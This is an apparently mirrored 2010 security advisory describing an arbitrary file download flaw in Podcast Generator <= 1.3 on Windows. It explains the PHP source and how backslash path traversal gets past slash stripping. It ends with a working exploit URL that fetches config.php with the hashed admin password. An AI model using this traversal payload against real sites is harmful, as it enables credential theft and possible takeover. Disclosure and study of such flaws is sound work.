You are on page 1of 2

Podcast Generator <= 1.

3 Arbitrary File Download ( Windows )


Vulnerable file is download.php, let's start from lines 25-27:
-------------------------------------------------------
25. $filename = $_GET['filename'];
26.
27. $filename = eregi_replace("/", "", $filename);
-------------------------------------------------------
so, PHP will strip every slash in the filename variable.. but under
Windows that doesn't matter, because we can use Back-slash ( \ ).
Ok, that was simple, than comes the real challenge..
-------------------------------------------------------
33. if (file_exists("$filename_path") ) { // check real existence of the file. A
void possible cross-site scripting attacks
34.
35. $file_media = explode(".",$filename); //divide filename from extension
36.
37. $fileData = checkFileType($file_media[1],$podcast_filetypes,$filemim
etypes);
-------------------------------------------------------
no prob with line 33 if the file real exists but on line 37 there is a call to c
heckFileType:
-------------------------------------------------------
15. function checkFileType ($filetype,$podcast_filetypes,$filemimetypes) {
16. $i=0;
17. $bool=false;
18. $fileData = array();
19.
20. while (($i < sizeof($podcast_filetypes)) && $bool==false) {
21. if ($filetype==$podcast_filetypes[$i]) {
22. $fileData[0]=$podcast_filetypes[$i];
23. $fileData[1]=$filemimetypes[$i];
24. $bool=true;
25. }
26. $i+=1;
27. }
28. return $fileData;
29.}
-------------------------------------------------------
and essentially checks if the string after the first dot is in the list of suppo
rted media;
<offtopic>
not usefull for this vuln, but wanna hilight you a thing..
supported file ext are stored in supported_media.php in this format:
-------------------------------------------------------
18. $podcast_filetypes = array(); //filetypes array to handle multiple filetypes
19.
20. $podcast_filetypes[0]="mp3";
-------------------------------------------------------
if the author forget to declare the new array variable (18), it is possible to i
nsert a fake extension if
register_globals is turned on..
</offtopic>
back to vuln, i ha ve discovered that windows, while accessing to nested dirs do
es not checks if every name of dir provided
exists, just checks if the result is true or false.. for example, see that cmd l
ist:
-------------------------------------------------------
Z:\media\AA845DA3845D72B5>mkdir tmp
Z:\media\AA845DA3845D72B5>cd tmp
Z:\media\AA845DA3845D72B5\tmp>dir
Il volume nell'unitÀ Z non ha etichetta.
Numero di serie del volume: 0000-0000
Directory di Z:\media\AA845DA3845D72B5\tmp
09/03/2010 13.33 <DIR> .
09/03/2010 13.33 <DIR> ..
0 File 0 byte
2 Directory 299.372.544 byte disponibili
Z:\media\AA845DA3845D72B5\tmp>
-------------------------------------------------------
so, new dir is empty but..
-------------------------------------------------------
Z:\media\AA845DA3845D72B5\tmp>cd donno\wanna\write\..\..\..\..\
Z:\media\AA845DA3845D72B5>
-------------------------------------------------------
Win does not return errors, just go up one dir. Now we are ready to exploit podc
astgen with an url like that:
http://www.example.com/podcastgen/download.php?filename=.mp3.\..\..\config.php
and download the config file with hashed admin password, that if cracked can lea
d to a remote code execution.
[BlackHawk - 09/03/2010 - Some right reserved (http://creativecommons.org/licens
es/by-nc-sa/2.5/it/) ]

You might also like